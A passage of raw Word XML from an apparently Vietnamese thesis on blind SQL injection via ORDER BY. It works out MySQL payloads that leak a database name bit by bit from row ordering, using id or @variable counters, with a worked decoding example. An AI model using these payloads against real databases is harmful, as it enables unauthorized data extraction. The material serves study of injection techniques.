        <w:spacing w:line="360" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="005D3C52">
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
        </w:rPr>
        <w:t>Biểu thức trong mệnh đề ORDER BY có thể xây dựng như sau:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="0034667B" w:rsidRPr="005D3C52" w:rsidRDefault="003F7098" w:rsidP="003633C3">
      <w:pPr>
        <w:spacing w:line="360" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="005D3C52">
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
        </w:rPr>
        <w:t>IF(ASCII(substr(database,1,1))=1,</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="0034667B" w:rsidRPr="005D3C52" w:rsidRDefault="003F7098" w:rsidP="003633C3">
      <w:pPr>
        <w:spacing w:line="360" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="005D3C52">
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
        </w:rPr>
        <w:tab/>
        <w:t>#Nếu mã ASCII ký tự đầu tiên là 1</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="0034667B" w:rsidRPr="005D3C52" w:rsidRDefault="003F7098" w:rsidP="003633C3">
      <w:pPr>
        <w:spacing w:line="360" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
        </w:rPr>
      </w:pP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If(id=1,</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="0034667B" w:rsidRPr="005D3C52" w:rsidRDefault="003F7098" w:rsidP="003633C3">
      <w:pPr>
        <w:spacing w:line="360" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="005D3C52">
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:tab/>
      </w:r>
      <w:r w:rsidRPr="005D3C52">
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
        </w:rPr>
        <w:tab/>
        <w:t># Nếu là row có id là 1, trả về 1 (cho giá trị ô trong cột ảo để sắp xếp)</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1,</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 Nếu không phải là 1, xem có phải là 2 không</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If(id=2),</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Nếu là row có id là 2, trả về 2</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2,</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Nếu không phải là 2, xem có phải là 3 không</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Làm tương tự cho đến hết id=5</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ind w:left="1440"/>
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="005D3C52">
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
        </w:rPr>
        <w:t>)</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="0034667B" w:rsidRPr="005D3C52" w:rsidRDefault="003F7098" w:rsidP="003633C3">
      <w:pPr>
        <w:spacing w:line="360" w:lineRule="auto"/>
        <w:ind w:left="720"/>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ab/>
        <w:t>#Nếu mã ASCII ký tự đầu tiên không phải là 1</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="0034667B" w:rsidRPr="005D3C52" w:rsidRDefault="003F7098" w:rsidP="003633C3">
      <w:pPr>
        <w:spacing w:line="360" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
        </w:rPr>
      </w:pP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IF(ASCII(substr(database,1,1))=1,</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If(id=1,</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 Lần lượt kiểm tra row id, tương tự như ở trường hợp ASCII=1</w:t>
      </w:r>
      <w:r w:rsidRPr="005D3C52">
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
        </w:rPr>
        <w:tab/>
      </w:r>
      <w:r w:rsidRPr="005D3C52">
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
        </w:rPr>
        <w:tab/>
      </w:r>
      <w:r w:rsidRPr="005D3C52">
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
        </w:rPr>
        <w:tab/>
      </w:r>
    </w:p>
    <w:p w:rsidR="0034667B" w:rsidRPr="005D3C52" w:rsidRDefault="003F7098" w:rsidP="003633C3">
      <w:pPr>
        <w:spacing w:line="360" w:lineRule="auto"/>
        <w:ind w:left="2160"/>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Nếu mã ASCII ký tự đầu tiên không phải là 2, tiếp tục đến 3. Làm tương tự đến hết 120</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ab/>
        <w:t>)</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="0034667B" w:rsidRPr="005D3C52" w:rsidRDefault="003F7098" w:rsidP="003633C3">
      <w:pPr>
        <w:spacing w:line="360" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="005D3C52">
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
        </w:rPr>
        <w:t>) # Đóng</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="0034667B" w:rsidRPr="005D3C52" w:rsidRDefault="003F7098" w:rsidP="003633C3">
      <w:pPr>
        <w:spacing w:line="360" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="005D3C52">
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t xml:space="preserve">Phía kẻ tấn công, sẽ thực hiện phân tích thứ tự dữ liệu trả về, so sánh với bảng tra cứu giữa vị trí và mã của ký tự để trích xuất ra được ký tự mong muốn. </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="0034667B" w:rsidRPr="005D3C52" w:rsidRDefault="003F7098" w:rsidP="003633C3">
      <w:pPr>
        <w:spacing w:line="360" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="005D3C52">
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
        </w:rPr>
        <w:t>Phương pháp này cho phép chỉ một lần yêu cầu có thể lấy về được ít nhất 1 ký tự, nếu như có từ 5 dòng trả về trở lên. Tuy nhiên, như đã thấy, phương pháp này tạo ra một câu lệnh truy vấn khá là dài. Một phương pháp khác là áp dụng kỹ thuật dịch bit ở trên.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="0034667B" w:rsidRPr="005D3C52" w:rsidRDefault="003F7098" w:rsidP="003633C3">
      <w:pPr>
        <w:spacing w:line="360" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="005D3C52">
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
        </w:rPr>
        <w:t>Một ký tự khi chuyển sang ASCII rồi hệ phân có thể biểu diễn bằng 7 ký tự. Xếp 7 ký tự tương ứng với vị trí của 7 row trả về, lần lượt từ 1 đến 7. Nếu như có thể làm thế nào đó để mỗi row có thể hiển thị trạng thái của bit tương ứng thì sẽ lấy được giá trị của ký tự cần tìm. Lúc này, mỗi bit sẽ có thể 1 trong 2 trường hợp: 0 hoặc 1. Vậy làm thế nào để row có thể hiển thị được 0/1 theo bit tương ứng ?</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="0034667B" w:rsidRDefault="003F7098" w:rsidP="003633C3">
      <w:pPr>
        <w:spacing w:line="360" w:lineRule="auto"/>
      </w:pPr>
      <w:r w:rsidRPr="005D3C52">
        <w:t>Phương pháp ở đây là: Lấy dòng có id là 1 làm mốc và các bit từ 0 đến 6. Lần lượt thực hiện phép dịch phải bit từ 0 đến 6 để lấy từng bit một (từ phải qua trái, bit thấp đến bit cao). Vì số id đến từ 1, và mất một dòng làm mốc (id=1) nên để số bit cần dịch sẽ là (id-2). Nếu bit đó là 0, sắp xếp sao cho ở trước row có id là 1, nếu bit đó là 1, sắp xếp sao cho ở sau row có id là 1. Khi thực hiện phân tích thứ tự trả về, nếu thấy dòng n xuất hiện trước dòng 1, thì bit (n-2) từ phải sang là 0, còn xuất hiện sau dòng 1 thì bit (n-2) từ phải sang là 1, đây chính là giá trị Return (r) . Mã ASCII của ký tự là: ∑2</w:t>
      </w:r>
      <w:r w:rsidRPr="005D3C52">
        <w:rPr>
          <w:vertAlign w:val="superscript"/>
        </w:rPr>
        <w:t>(n-2)</w:t>
      </w:r>
      <w:r w:rsidRPr="005D3C52">
        <w:t>*r.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="003D0410" w:rsidRDefault="00891990" w:rsidP="00555D31">
      <w:pPr>
        <w:ind w:firstLine="0"/>
        <w:jc w:val="center"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="41F0C03D" wp14:editId="4C0BAF9D">
            <wp:extent cx="5494392" cy="3692105"/>
            <wp:effectExtent l="19050" t="0" r="0" b="0"/>
            <wp:docPr id="50" name="Picture 49" descr="luoc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do_1.png"/>
                    <pic:cNvPicPr/>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId41"/>
                    <a:srcRect l="5013" t="5918" r="3221" b="6735"/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="5494392" cy="3692105"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w:rsidR="0034667B" w:rsidRPr="0033595B" w:rsidRDefault="003F7098" w:rsidP="003633C3">
      <w:pPr>
        <w:spacing w:line="360" w:lineRule="auto"/>
      </w:pPr>
      <w:r w:rsidRPr="005D3C52">
        <w:t>Để làm cho dòng đó xuất hiện trước/sau dòng 1 có thể sử dụng một cách đơn giản là: biểu thức trả về 0 nếu bit đó là 0, trả về 2 nếu bit đó là 1, đối với row có id là 1 thì trả về</w:t>
      </w:r>
      <w:r w:rsidR="0033595B">
        <w:t xml:space="preserve"> 1 s</w:t>
      </w:r>
      <w:r w:rsidRPr="005D3C52">
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
        </w:rPr>
        <w:t>ẽ có bảng tương ứng</w:t>
      </w:r>
      <w:r w:rsidR="0033595B">
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
        </w:rPr>
        <w:t xml:space="preserve"> sau</w:t>
      </w:r>
      <w:r w:rsidRPr="005D3C52">
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
        </w:rPr>
        <w:t>:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="008F328A" w:rsidRPr="00B35184" w:rsidRDefault="008F328A" w:rsidP="00313D3F">
      <w:pPr>
        <w:pStyle w:val="Caption"/>
      </w:pPr>
      <w:bookmarkStart w:id="82" w:name="_Toc459803832"/>
      <w:r w:rsidRPr="00B35184">
        <w:t xml:space="preserve">Bảng </w:t>
      </w:r>
      <w:fldSimple w:instr=" STYLEREF 1 \s ">
        <w:r w:rsidR="005F5912">
          <w:rPr>
            <w:noProof/>
          </w:rPr>
          <w:t>3</w:t>
        </w:r>
      </w:fldSimple>
      <w:r w:rsidR="00313D3F">
        <w:t>.</w:t>
      </w:r>
      <w:fldSimple w:instr=" SEQ Bảng \* ARABIC \s 1 ">
        <w:r w:rsidR="005F5912">
          <w:rPr>
            <w:noProof/>
          </w:rPr>
          <w:t>2</w:t>
        </w:r>
      </w:fldSimple>
      <w:r w:rsidRPr="00B35184">
        <w:t>: Bảng chuyển đổi giữa thứ tự và mã ASCII của ký tự</w:t>
      </w:r>
      <w:bookmarkEnd w:id="82"/>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8F328A">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5</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w:rsidR="0034667B" w:rsidRPr="005D3C52" w:rsidRDefault="003F7098" w:rsidP="003633C3">
      <w:pPr>
        <w:spacing w:line="360" w:lineRule="auto"/>
      </w:pPr>
      <w:r w:rsidRPr="005D3C52">
        <w:t xml:space="preserve">Thứ tự sau khi sắp xếp (theo tăng dần) sẽ là:  3 4 5 6 7 </w:t>
      </w:r>
      <w:r w:rsidRPr="005D3C52">
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t>1</w:t>
      </w:r>
      <w:r w:rsidRPr="005D3C52">
        <w:t xml:space="preserve"> 2 8. Phân tích kết quả trả về, thấy row 2 và 8 ở sau 1 nên bit 0 và 6 sẽ là 1, các bit còn lại là 0. Do đó mã nhị phân của ký tự đó sẽ là:, tương ứng với giá trị A. Mã tấn công của phương pháp có thể được xây dựng như sau:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="0034667B" w:rsidRPr="005D3C52" w:rsidRDefault="003F7098" w:rsidP="003633C3">
      <w:pPr>
        <w:spacing w:line="360" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="005D3C52">
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
        </w:rPr>
        <w:t>If(id&lt;9,</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="0034667B" w:rsidRPr="005D3C52" w:rsidRDefault="003F7098" w:rsidP="003633C3">
      <w:pPr>
        <w:spacing w:line="360" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="005D3C52">
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
        </w:rPr>
        <w:tab/>
        <w:t># Chỉ lấy id từ 1 đến 8</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="0034667B" w:rsidRPr="005D3C52" w:rsidRDefault="003F7098" w:rsidP="003633C3">
      <w:pPr>
        <w:spacing w:line="360" w:lineRule="auto"/>
        <w:ind w:left="720"/>
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="005D3C52">
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
        </w:rPr>
        <w:t>if(id=1,1,</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="0034667B" w:rsidRPr="005D3C52" w:rsidRDefault="003F7098" w:rsidP="003633C3">
      <w:pPr>
        <w:spacing w:line="360" w:lineRule="auto"/>
        <w:ind w:firstLine="0"/>
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="005D3C52">
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
        </w:rPr>
        <w:tab/>
      </w:r>
      <w:r w:rsidRPr="005D3C52">
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
        </w:rPr>
        <w:tab/>
        <w:t># Nếu id là 1, trả về 1, nếu không thực hiện dịch bit</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="0034667B" w:rsidRPr="005D3C52" w:rsidRDefault="003F7098" w:rsidP="003633C3">
      <w:pPr>
        <w:spacing w:line="360" w:lineRule="auto"/>
        <w:ind w:left="1440"/>
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="005D3C52">
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>If((((ascii(substring(database(),1,1))) &gt;&gt; (id-2)) mod 2)=1,</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="0034667B" w:rsidRPr="005D3C52" w:rsidRDefault="003F7098" w:rsidP="003633C3">
      <w:pPr>
        <w:spacing w:line="360" w:lineRule="auto"/>
        <w:ind w:left="1440"/>
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="005D3C52">
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
        </w:rPr>
        <w:t># Nếu bit là 1, trả về 2</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="0034667B" w:rsidRPr="005D3C52" w:rsidRDefault="003F7098" w:rsidP="003633C3">
      <w:pPr>
        <w:spacing w:line="360" w:lineRule="auto"/>
        <w:ind w:left="1440"/>
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="005D3C52">
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
        </w:rPr>
        <w:t>2,</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="0034667B" w:rsidRPr="005D3C52" w:rsidRDefault="003F7098" w:rsidP="003633C3">
      <w:pPr>
        <w:spacing w:line="360" w:lineRule="auto"/>
        <w:ind w:left="1440"/>
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="005D3C52">
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
        </w:rPr>
        <w:t># Nếu bit là 1, trả về 0</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="0034667B" w:rsidRPr="005D3C52" w:rsidRDefault="003F7098" w:rsidP="003633C3">
      <w:pPr>
        <w:spacing w:line="360" w:lineRule="auto"/>
        <w:ind w:left="1440"/>
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="005D3C52">
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
        </w:rPr>
        <w:t>0</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="0034667B" w:rsidRPr="005D3C52" w:rsidRDefault="003F7098" w:rsidP="003633C3">
      <w:pPr>
        <w:spacing w:line="360" w:lineRule="auto"/>
        <w:ind w:left="1440"/>
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="005D3C52">
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
        </w:rPr>
        <w:t>)),</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="0034667B" w:rsidRPr="005D3C52" w:rsidRDefault="003F7098" w:rsidP="003633C3">
      <w:pPr>
        <w:spacing w:line="360" w:lineRule="auto"/>
        <w:ind w:left="720"/>
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="005D3C52">
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
        </w:rPr>
        <w:t># Lớn hơn 8 trả về 3</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="0034667B" w:rsidRPr="005D3C52" w:rsidRDefault="003F7098" w:rsidP="003633C3">
      <w:pPr>
        <w:spacing w:line="360" w:lineRule="auto"/>
        <w:ind w:left="720"/>
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="005D3C52">
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
        </w:rPr>
        <w:t>3</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="0034667B" w:rsidRPr="005D3C52" w:rsidRDefault="003F7098" w:rsidP="003633C3">
      <w:pPr>
        <w:spacing w:line="360" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="005D3C52">
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
        </w:rPr>
        <w:t>)</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="0034667B" w:rsidRPr="005D3C52" w:rsidRDefault="003F7098" w:rsidP="003633C3">
      <w:pPr>
        <w:spacing w:line="360" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="005D3C52">
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
        </w:rPr>
        <w:t>Thử nghiệm với bảng ví dụ ở trên:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="004F69FA" w:rsidRPr="005D3C52" w:rsidRDefault="003F7098" w:rsidP="004F69FA">
      <w:pPr>
        <w:keepNext/>
        <w:ind w:firstLine="0"/>
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="005D3C52">
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="775CF080" wp14:editId="43834FDE">
            <wp:extent cx="5723255" cy="277177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2"/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr bwMode="auto">
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="5770688" cy="2794747"/>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83" w:name="_Toc459819448"/>
      <w:r w:rsidRPr="005D3C52">
        <w:t xml:space="preserve">Hình </w:t>
      </w:r>
      <w:fldSimple w:instr=" STYLEREF 1 \s ">
        <w:r w:rsidR="005F5912">
          <w:rPr>
            <w:noProof/>
          </w:rPr>
          <w:t>3</w:t>
        </w:r>
      </w:fldSimple>
      <w:r w:rsidR="000512EB">
        <w:t>.</w:t>
      </w:r>
      <w:fldSimple w:instr=" SEQ Hình \* ARABIC \s 1 ">
        <w:r w:rsidR="005F5912">
          <w:rPr>
            <w:noProof/>
          </w:rPr>
          <w:t>7</w:t>
        </w:r>
      </w:fldSimple>
      <w:r w:rsidRPr="005D3C52">
        <w:t xml:space="preserve">: </w:t>
      </w:r>
      <w:r w:rsidR="003F7098" w:rsidRPr="005D3C52">
        <w:t>Áp dụng lấy ký tự đầu tiên trong tên CSDL.</w:t>
      </w:r>
      <w:bookmarkEnd w:id="83"/>
    </w:p>
    <w:p w:rsidR="0034667B" w:rsidRPr="005D3C52" w:rsidRDefault="003F7098" w:rsidP="003633C3">
      <w:pPr>
        <w:spacing w:line="360" w:lineRule="auto"/>
      </w:pPr>
      <w:r w:rsidRPr="005D3C52">
        <w:t xml:space="preserve">Thứ tự sắp xếp là: 4 5 </w:t>
      </w:r>
      <w:r w:rsidRPr="005D3C52">
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t>1</w:t>
      </w:r>
      <w:r w:rsidRPr="005D3C52">
        <w:t xml:space="preserve"> 8 7 6 3 2. Cho vào bảng ánh xạ</w:t>
      </w:r>
      <w:r w:rsidR="00FC785D">
        <w:t>:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00B35184" w:rsidRPr="00B35184" w:rsidRDefault="00B35184" w:rsidP="00313D3F">
      <w:pPr>
        <w:pStyle w:val="Caption"/>
      </w:pPr>
      <w:bookmarkStart w:id="84" w:name="_Toc459803833"/>
      <w:r w:rsidRPr="00B35184">
        <w:t xml:space="preserve">Bảng </w:t>
      </w:r>
      <w:fldSimple w:instr=" STYLEREF 1 \s ">
        <w:r w:rsidR="005F5912">
          <w:rPr>
            <w:noProof/>
          </w:rPr>
          <w:t>3</w:t>
        </w:r>
      </w:fldSimple>
      <w:r w:rsidR="00313D3F">
        <w:t>.</w:t>
      </w:r>
      <w:fldSimple w:instr=" SEQ Bảng \* ARABIC \s 1 ">
        <w:r w:rsidR="005F5912">
          <w:rPr>
            <w:noProof/>
          </w:rPr>
          <w:t>3</w:t>
        </w:r>
      </w:fldSimple>
      <w:r w:rsidRPr="00B35184">
        <w:t>: Bảng chuyển đổi giữa thứ tự và mã ASCII của ký tự đầu tiên trong tên CSDL</w:t>
      </w:r>
      <w:bookmarkEnd w:id="84"/>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B35184">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5</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w:rsidR="0034667B" w:rsidRPr="005D3C52" w:rsidRDefault="003F7098" w:rsidP="003633C3">
      <w:pPr>
        <w:spacing w:line="360" w:lineRule="auto"/>
      </w:pPr>
      <w:r w:rsidRPr="005D3C52">
        <w:t xml:space="preserve">Vậy ký tự cần tìm có mã nhị phân: 1110011 tương ứng với mã 115 trong bảng mã ASCII, là ký tự ‘s’.Như vậy với một lần gửi yêu cầu có thể lấy được </w:t>
      </w:r>
      <w:r w:rsidRPr="005D3C52">
        <w:lastRenderedPageBreak/>
        <w:t>một ký tự. Phương pháp này đòi hỏi phải có tối thiểu 8 row trả về, nhiều hơn so với phương pháp ở trên (5 row). Tuy nhiên, cách thức triển khai của phương pháp này đơn giản, dễ dàng hơn phương pháp ban đầu.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="0034667B" w:rsidRPr="005D3C52" w:rsidRDefault="003F7098" w:rsidP="003633C3">
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
        <w:spacing w:line="360" w:lineRule="auto"/>
      </w:pPr>
      <w:bookmarkStart w:id="85" w:name="_Toc459822513"/>
      <w:r w:rsidRPr="005D3C52">
        <w:t>Giới hạn của phương pháp</w:t>
      </w:r>
      <w:bookmarkEnd w:id="85"/>
    </w:p>
    <w:p w:rsidR="0034667B" w:rsidRPr="005D3C52" w:rsidRDefault="003F7098" w:rsidP="003633C3">
      <w:pPr>
        <w:spacing w:line="360" w:lineRule="auto"/>
      </w:pPr>
      <w:r w:rsidRPr="005D3C52">
        <w:t>Như đã biết, phương pháp sắp xếp và trích xuất dựa trên thứ tự trả về của dữ liệu đòi hỏi phải có tối thiểu 8 row trả về trong kết quả. Ngoài ra, khi áp dụng vào quá trình tấn công thực tế sẽ gặp một số vấn đề là: phải có cột id, và giá trị của cột id này phải tăng dần liên tục: Ý tưởng chính của phương pháp dựa vào cột id có giá trị tăng dần liên tiếp. Trong nhiều trường hợp cụ thể, sẽ không có cột id này, hoặc đơn giản là sẽ không biết tên cột, giá trị các id trả về không liên tục. Để khắc phục vấn đề này cần sử dụng một biến của DBMS thay thế cho id. Giá trị của biến này sẽ tăng dần qua mỗi dòng:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="0034667B" w:rsidRPr="005D3C52" w:rsidRDefault="003F7098" w:rsidP="003633C3">
      <w:pPr>
        <w:spacing w:line="360" w:lineRule="auto"/>
        <w:ind w:firstLine="0"/>
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="005D3C52">
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
        </w:rPr>
        <w:tab/>
        <w:t># Sử dụng biến nên cần select</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="0034667B" w:rsidRPr="005D3C52" w:rsidRDefault="003F7098" w:rsidP="003633C3">
      <w:pPr>
        <w:spacing w:line="360" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="005D3C52">
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
        </w:rPr>
        <w:t>(select</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="0034667B" w:rsidRPr="005D3C52" w:rsidRDefault="003F7098" w:rsidP="003633C3">
      <w:pPr>
        <w:spacing w:line="360" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="005D3C52">
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
        </w:rPr>
        <w:tab/>
        <w:t># Tăng dần giá trị của biến qua mỗi lần duyệt dòng</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="0034667B" w:rsidRPr="005D3C52" w:rsidRDefault="003F7098" w:rsidP="003633C3">
      <w:pPr>
        <w:spacing w:line="360" w:lineRule="auto"/>
        <w:ind w:left="720"/>
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="005D3C52">
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
        </w:rPr>
        <w:t>if((@hbn:=@hbn+1)&lt;9,if(@hbn=1,1,</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="0034667B" w:rsidRPr="005D3C52" w:rsidRDefault="003F7098" w:rsidP="003633C3">
      <w:pPr>
        <w:spacing w:line="360" w:lineRule="auto"/>
        <w:ind w:left="720"/>
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="005D3C52">
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
        </w:rPr>
        <w:t># Phương pháp tương tự như trên</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="0034667B" w:rsidRPr="005D3C52" w:rsidRDefault="003F7098" w:rsidP="003633C3">
      <w:pPr>
        <w:spacing w:line="360" w:lineRule="auto"/>
        <w:ind w:left="720"/>
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="005D3C52">
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
        </w:rPr>
        <w:t xml:space="preserve">if((((ascii(substring(database(),1,1))) &gt;&gt; (@hbn-2)) mod 2)=1,2,0)),3) </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="0034667B" w:rsidRPr="005D3C52" w:rsidRDefault="003F7098" w:rsidP="003633C3">
      <w:pPr>
